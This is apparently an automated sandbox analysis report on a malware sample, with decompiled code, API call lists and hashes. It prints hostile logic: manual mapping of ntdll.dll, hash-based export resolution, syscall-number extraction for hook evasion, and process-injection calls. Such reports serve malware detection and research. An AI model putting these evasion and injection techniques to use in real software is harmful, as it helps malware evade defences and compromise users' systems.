				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void* _v76;
				intOrPtr _v80;
				signed char _v84;
				long _v88;
				short _v90;
				short _v92;
				short _v94;
				short _v96;
				short _v98;
				short _v100;
				short _v102;
				short _v104;
				short _v106;
				char _v108;
				short _t141;
				short _t142;
				short _t143;
				short _t144;
				short _t145;
				short _t146;
				short _t147;
				short _t148;
				short _t149;
				int _t165;
				signed int _t169;
				intOrPtr _t175;
				signed int _t195;
				signed int _t210;
				signed int _t222;

				_v24 = _v24 & 0x00000000;
				_v48 = _v48 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t141 = 0x6e;
				_v108 = _t141;
				_t142 = 0x74;
				_v106 = _t142;
				_t143 = 0x64;
				_v104 = _t143;
				_t144 = 0x6c;
				_v102 = _t144;
				_t145 = 0x6c;
				_v100 = _t145;
				_t146 = 0x2e;
				_v98 = _t146;
				_t147 = 0x64;
				_v96 = _t147;
				_t148 = 0x6c;
				_v94 = _t148;
				_t149 = 0x6c;
				_v92 = _t149;
				_v90 = 0;
				_v16 = _v16 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_t23 =  &_v44;
				 *_t23 = _v44 & 0x00000000;
				_t222 =  *_t23;
				_v20 = E100056FB();
				_v64 = E100057A3(_v20, 0x8a111d91);
				_v68 = E100057A3(_v20, 0x170c1ca1);
				_v52 = E100057A3(_v20, 0xa5f15738);
				_v72 = E100057A3(_v20, 0x433a3842);
				_v56 = E100057A3(_v20, 0xd6eb2188);
				_v60 = E100057A3(_v20, 0x50a26af);
				_v80 = E100057A3(_v20, 0x55e38b1f);
				_v44 = 1;
				while(1) {
					_v16 = CreateFileW(E100058FE(_t222,  &_v108), 0x80000000, 7, 0, 3, 0x80, 0);
					if(_v16 == 0xffffffff) {
						break;
					}
					_v36 = _v68(_v16, 0);
					__eflags = _v36 - 0xffffffff;
					if(_v36 != 0xffffffff) {
						_v12 = VirtualAlloc(0, _v36, 0x3000, 4);
						__eflags = _v12;
						if(_v12 != 0) {
							_t165 = ReadFile(_v16, _v12, _v36,  &_v88, 0);
							__eflags = _t165;
							if(_t165 != 0) {
								_v76 = _v12;
								_v32 = _v12 +  *((intOrPtr*)(_v76 + 0x3c));
								_t169 =  *(_v32 + 0x14) & 0x0000ffff;
								_t213 = _v32;
								_t68 = _t169 + 0x18; // 0x8000018
								_v40 = _v32 + _t68;
								_v24 = VirtualAlloc(0,  *(_v32 + 0x50), 0x3000, 4);
								__eflags = _v24;
								if(_v24 != 0) {
									E10005713(_t213, _v24, _v12,  *((intOrPtr*)(_v32 + 0x54)));
									_v28 = _v28 & 0x00000000;
									while(1) {
										_t175 = _v32;
										__eflags = _v28 - ( *(_t175 + 6) & 0x0000ffff);
										if(_v28 >= ( *(_t175 + 6) & 0x0000ffff)) {
											break;
										}
										E10005713(_v40, _v24 +  *((intOrPtr*)(_v40 + 0xc + _v28 * 0x28)), _v12 +  *((intOrPtr*)(_v40 + 0x14 + _v28 * 0x28)),  *((intOrPtr*)(_v40 + 0x10 + _v28 * 0x28)));
										_t210 = _v28 + 1;
										__eflags = _t210;
										_v28 = _t210;
									}
									_v48 = E100057A3(_v24, _a4);
									__eflags = _v48;
									if(_v48 != 0) {
										__eflags = _v16;
										if(_v16 != 0) {
											FindCloseChangeNotification(_v16);
										}
										__eflags = _v12;
										if(_v12 != 0) {
											VirtualFree(_v12, 0, 0x8000);
										}
										_v44 = _v44 & 0x00000000;
										__eflags = 0;
										if(0 != 0) {
											continue;
										}
									} else {
									}
								} else {
								}
							} else {
							}
						} else {
						}
					} else {
					}
					L22:
					if(_v44 != 0) {
						if(_v16 != 0) {
							_v56(_v16);
						}
						_v80(0);
					}
					_v8 = _v48;
					while(1 != 0) {
						if(( *_v8 & 0x000000ff) != 0xb8) {
							__eflags = ( *_v8 & 0x000000ff) - 0xe9;
							if(( *_v8 & 0x000000ff) != 0xe9) {
								__eflags = ( *_v8 & 0x000000ff) - 0xea;
								if(( *_v8 & 0x000000ff) != 0xea) {
									_t195 = _v8 + 1;
									__eflags = _t195;
									_v8 = _t195;
								} else {
									_v8 =  *(_v8 + 1);
								}
							} else {
								_t125 =  *(_v8 + 1) + 5; // 0x5
								_v8 = _v8 + _t125;
							}
							continue;
						} else {
						}
						break;
					}
					_v8 = _v8 + 1;
					_v84 =  *_v8;
					if(_v24 != 0) {
						VirtualFree(_v24, 0, 0x8000);
					}
					return _v84;
				}
				goto L22;
			}

















































                                                                                0x10004731
                                                                                0x10004735
                                                                                0x10004739
                                                                                0x1000473f
                                                                                0x10004740
                                                                                0x10004746
                                                                                0x10004747
                                                                                0x1000474d
                                                                                0x1000474e
                                                                                0x10004754
                                                                                0x10004755
                                                                                0x1000475b
                                                                                0x1000475c
                                                                                0x10004762
                                                                                0x10004763
                                                                                0x10004769
                                                                                0x1000476a
                                                                                0x10004770
                                                                                0x10004771
                                                                                0x10004777
                                                                                0x10004778
                                                                                0x1000477e
                                                                                0x10004782
                                                                                0x10004786
                                                                                0x1000478a
                                                                                0x1000478e
                                                                                0x1000478e
                                                                                0x1000478e
                                                                                0x10004797
                                                                                0x100047a7
                                                                                0x100047b7
                                                                                0x100047c7
                                                                                0x100047d7
                                                                                0x100047e7
                                                                                0x100047f7
                                                                                0x10004807
                                                                                0x1000480a
                                                                                0x10004811
                                                                                0x10004830
                                                                                0x10004837
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x10004846
                                                                                0x10004849
                                                                                0x1000484d
                                                                                0x10004863
                                                                                0x10004866
                                                                                0x1000486a
                                                                                0x10004880
                                                                                0x10004883
                                                                                0x10004885
                                                                                0x1000488f
                                                                                0x1000489b
                                                                                0x100048a1
                                                                                0x100048a5
                                                                                0x100048a8
                                                                                0x100048ac
                                                                                0x100048c1
                                                                                0x100048c4
                                                                                0x100048c8
                                                                                0x100048db
                                                                                0x100048e0
                                                                                0x100048ed
                                                                                0x100048ed
                                                                                0x100048f4
                                                                                0x100048f7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x10004922
                                                                                0x100048e9
                                                                                0x100048e9
                                                                                0x100048ea
                                                                                0x100048ea
                                                                                0x10004934
                                                                                0x10004937
                                                                                0x1000493b
                                                                                0x1000493f
                                                                                0x10004943
                                                                                0x10004948
                                                                                0x10004948
                                                                                0x1000494b
                                                                                0x1000494f
                                                                                0x1000495b
                                                                                0x1000495b
                                                                                0x1000495e
                                                                                0x10004962
                                                                                0x10004964
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x1000493d
                                                                                0x00000000
                                                                                0x100048ca
                                                                                0x00000000
                                                                                0x10004887
                                                                                0x00000000
                                                                                0x1000486c
                                                                                0x00000000
                                                                                0x1000484f
                                                                                0x1000496a
                                                                                0x1000496e
                                                                                0x10004974
                                                                                0x10004979
                                                                                0x10004979
                                                                                0x1000497e
                                                                                0x1000497e
                                                                                0x10004984
                                                                                0x10004987
                                                                                0x10004997
                                                                                0x100049a1
                                                                                0x100049a6
                                                                                0x100049c0
                                                                                0x100049c5
                                                                                0x100049d5
                                                                                0x100049d5
                                                                                0x100049d6
                                                                                0x100049c7
                                                                                0x100049cd
                                                                                0x100049cd
                                                                                0x100049a8
                                                                                0x100049b1
                                                                                0x100049b5
                                                                                0x100049b5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x10004999
                                                                                0x00000000
                                                                                0x10004997
                                                                                0x100049df
                                                                                0x100049e7
                                                                                0x100049ee
                                                                                0x100049fa
                                                                                0x100049fa
                                                                                0x10004a03
                                                                                0x10004a03
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 1000482D
                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 100049FA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.235807350.0000000010004000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.235775448.0000000010000000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235794772.0000000010001000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235800984.0000000010003000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235820043.0000000010006000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CreateFileFreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 204039940-0
                                                                                • Opcode ID: a7a4138fd0b5ecd8483655997f2ac4997bbf9f7cf1aa8845e5dd8a7c0f2cfeab
                                                                                • Instruction ID: 9d4cecb05e3f61eda8aa7eced1d603deecc9f05734077c70b20079264eb7ffbe
                                                                                • Opcode Fuzzy Hash: a7a4138fd0b5ecd8483655997f2ac4997bbf9f7cf1aa8845e5dd8a7c0f2cfeab
                                                                                • Instruction Fuzzy Hash: A7A137B4D04209EFEF10CFE4D945BAEBBB1FF08352F21846AE514BA294CB755A50EB14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004056E3, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004056E3(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                                                0x004056e7
                                                                                0x004056ed
                                                                                0x004056ee
                                                                                0x004056ee
                                                                                0x004056ef
                                                                                0x004056f6
                                                                                0x00405700
                                                                                0x0040570d
                                                                                0x00405710
                                                                                0x00405718
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040571c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040571e
                                                                                0x00000000
                                                                                0x0040571e
                                                                                0x00000000

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 004056F6
                                                                                • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405710
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CountFileNameTempTick
                                                                                • String ID: "C:\Users\user\Desktop\h8lD4SWL35.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                • API String ID: 1716503409-2122398394
                                                                                • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                • Instruction ID: 090c9869d25c952b380026dfe3028592f3e254e5657c021594612e0629f183dd
                                                                                • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                • Instruction Fuzzy Hash: AFF0A736348204B7D7104F55EC04B9B7F5DDF91750F14C027F944DA1C0D6B1995597A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 10004064, Relevance: 6.5, APIs: 4, Instructions: 549processthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 10004399
                                                                                • GetThreadContext.KERNELBASE(?,00010007), ref: 100043BC
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 100043E0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.235807350.0000000010004000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.235775448.0000000010000000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235794772.0000000010001000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235800984.0000000010003000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235820043.0000000010006000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Process$ContextCreateMemoryReadThread
                                                                                • String ID:
                                                                                • API String ID: 2411489757-0
                                                                                • Opcode ID: bd1b8a16c19831b5c5d7bac9c697e58242ccfa9ce51a71aacd76884f63f6c015
                                                                                • Instruction ID: f3ea8cc0b1a4cd14c14665524e923b8eba8a5797fd798508009b9c802e25cc70
                                                                                • Opcode Fuzzy Hash: bd1b8a16c19831b5c5d7bac9c697e58242ccfa9ce51a71aacd76884f63f6c015
                                                                                • Instruction Fuzzy Hash: 693238B5D40208EEEB60CFA4DC45BEDB7B4FF44741F20449AE508FA2A0DB719A84DB19
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401F51, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 60%
                                                                                			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x423f38");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x423f08 =  *0x423f08 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E004029F6(0xfffffff0);
				 *(_t34 + 8) = E004029F6(1);
				if( *((intOrPtr*)(_t34 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404D7B(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x1c)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 0x34)), 0x400, 0x424000, 0x40af50, 0x409000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x1c)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x18)) == _t27 && E004034C6(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                0x00401f51
                                                                                0x00401f51
                                                                                0x00401f56
                                                                                0x00401f5d
                                                                                0x00402019
                                                                                0x00402164
                                                                                0x00402164
                                                                                0x0040288b
                                                                                0x0040288e
                                                                                0x0040289a
                                                                                0x0040289a
                                                                                0x00401f6c
                                                                                0x00401f76
                                                                                0x00401f79
                                                                                0x00401f88
                                                                                0x00401f8c
                                                                                0x00401f92
                                                                                0x00401f96
                                                                                0x00402012
                                                                                0x00000000
                                                                                0x00402012
                                                                                0x00401f98
                                                                                0x00401fa2
                                                                                0x00401fa6
                                                                                0x00401fea
                                                                                0x00401fa8
                                                                                0x00401fab
                                                                                0x00401fae
                                                                                0x00401fde
                                                                                0x00401fb0
                                                                                0x00401fb3
                                                                                0x00401fbc
                                                                                0x00401fbe
                                                                                0x00401fbe
                                                                                0x00401fbc
                                                                                0x00401fae
                                                                                0x00401ff2
                                                                                0x00402007
                                                                                0x00402007
                                                                                0x00000000
                                                                                0x00401ff2
                                                                                0x00401f7c
                                                                                0x00401f82
                                                                                0x00401f86
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                                                                                  • Part of subcall function 00404D7B: lstrlenA.KERNEL32(0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
                                                                                  • Part of subcall function 00404D7B: lstrlenA.KERNEL32(00402F8B,0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
                                                                                  • Part of subcall function 00404D7B: lstrcatA.KERNEL32(0041FC50,00402F8B,00402F8B,0041FC50,00000000,0040F020,00000000), ref: 00404DD7
                                                                                  • Part of subcall function 00404D7B: SetWindowTextA.USER32(0041FC50,0041FC50), ref: 00404DE9
                                                                                  • Part of subcall function 00404D7B: SendMessageA.USER32 ref: 00404E0F
                                                                                  • Part of subcall function 00404D7B: SendMessageA.USER32 ref: 00404E29
                                                                                  • Part of subcall function 00404D7B: SendMessageA.USER32 ref: 00404E37
                                                                                • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                                                                                • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402007
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                • String ID:
                                                                                • API String ID: 2987980305-0
                                                                                • Opcode ID: 9e94326ffafbc51c3d5843746bdf82dee0a5a5d2f3f0d8b6fd0aceac679305dc
                                                                                • Instruction ID: d4347cebb671b603d0a5d412fc90ce50d757f993dc699470b494ace3858b78d6
                                                                                • Opcode Fuzzy Hash: 9e94326ffafbc51c3d5843746bdf82dee0a5a5d2f3f0d8b6fd0aceac679305dc
                                                                                • Instruction Fuzzy Hash: 7221EE72D04216ABCF107FA4DE89A6E75B06B44359F204337F611B52E0D77C4941965E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004015B3, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 85%
                                                                                			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029F6(0xfffffff0);
				_t10 = E00405564(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E004054FB(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E004059DD(0x429800, _t25);
					SetCurrentDirectoryA(_t25);
				}
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                                                                0x004015b3
                                                                                0x004015ba
                                                                                0x004015bd
                                                                                0x004015c2
                                                                                0x004015c6
                                                                                0x004015c8
                                                                                0x004015d0
                                                                                0x004015d6
                                                                                0x004015d8
                                                                                0x004015db
                                                                                0x004015e3
                                                                                0x004015f0
                                                                                0x004015fd
                                                                                0x004015fd
                                                                                0x004015f2
                                                                                0x004015f3
                                                                                0x004015fb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004015fb
                                                                                0x004015f0
                                                                                0x00401600
                                                                                0x00401603
                                                                                0x00401605
                                                                                0x00401606
                                                                                0x004015c8
                                                                                0x0040160d
                                                                                0x0040162d
                                                                                0x00402164
                                                                                0x0040160f
                                                                                0x00401611
                                                                                0x0040161c
                                                                                0x00401622
                                                                                0x00401622
                                                                                0x0040288e
                                                                                0x0040289a

                                                                                APIs
                                                                                  • Part of subcall function 00405564: CharNextA.USER32(00405316,?,00421880,00000000,004055C8,00421880,00421880,?,?,00000000,00405316,?,"C:\Users\user\Desktop\h8lD4SWL35.exe" ,00000000), ref: 00405572
                                                                                  • Part of subcall function 00405564: CharNextA.USER32(00000000), ref: 00405577
                                                                                  • Part of subcall function 00405564: CharNextA.USER32(00000000), ref: 00405586
                                                                                • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                • SetCurrentDirectoryA.KERNEL32(00000000,00429800,00000000,00000000,000000F0), ref: 00401622
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                • String ID:
                                                                                • API String ID: 3751793516-0
                                                                                • Opcode ID: a0e83a61bd531ae9df7b982ab2de7025170448800513b938c14df29c481201bd
                                                                                • Instruction ID: ffaaac8e814952d4dd163c137c14166a37b00a477d69e33f5cc6849720afcf5a
                                                                                • Opcode Fuzzy Hash: a0e83a61bd531ae9df7b982ab2de7025170448800513b938c14df29c481201bd
                                                                                • Instruction Fuzzy Hash: 86010831908180ABDB116F795D44D6F27B0DA52365728473BF491B22E2C23C4942962E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00403097, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 84%
                                                                                			E00403097(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
				E00405C3B(_t6);
				_t2 = E0040553D(_t6);
				if(_t2 != 0) {
					E004054D0(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E004056E3("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                                                                                0x00403098
                                                                                0x0040309e
                                                                                0x004030a4
                                                                                0x004030ab
                                                                                0x004030b0
                                                                                0x004030b8
                                                                                0x004030c4
                                                                                0x004030ca
                                                                                0x004030ae
                                                                                0x004030ae
                                                                                0x004030ae

                                                                                APIs
                                                                                  • Part of subcall function 00405C3B: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\h8lD4SWL35.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405C93
                                                                                  • Part of subcall function 00405C3B: CharNextA.USER32(?,?,?,00000000), ref: 00405CA0
                                                                                  • Part of subcall function 00405C3B: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\h8lD4SWL35.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CA5
                                                                                  • Part of subcall function 00405C3B: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\h8lD4SWL35.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CB5
                                                                                • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 004030B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Char$Next$CreateDirectoryPrev
                                                                                • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                • API String ID: 4115351271-2030658151
                                                                                • Opcode ID: ee6a760937e7bbad2ec29a7a952d5be29f1033c154ebd203822f1ea6b75fd525
                                                                                • Instruction ID: 0b1452471cd423d1aacc48f18b0596171ff40f7633c15dd81945cca0e6b0d63f
                                                                                • Opcode Fuzzy Hash: ee6a760937e7bbad2ec29a7a952d5be29f1033c154ebd203822f1ea6b75fd525
                                                                                • Instruction Fuzzy Hash: 0DD0C92160BD3032D66136263D0AFCF155C8F5236EFA1447BF808B51C65B6C6A8219FF
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004063D9, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 99%
                                                                                			E004063D9() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
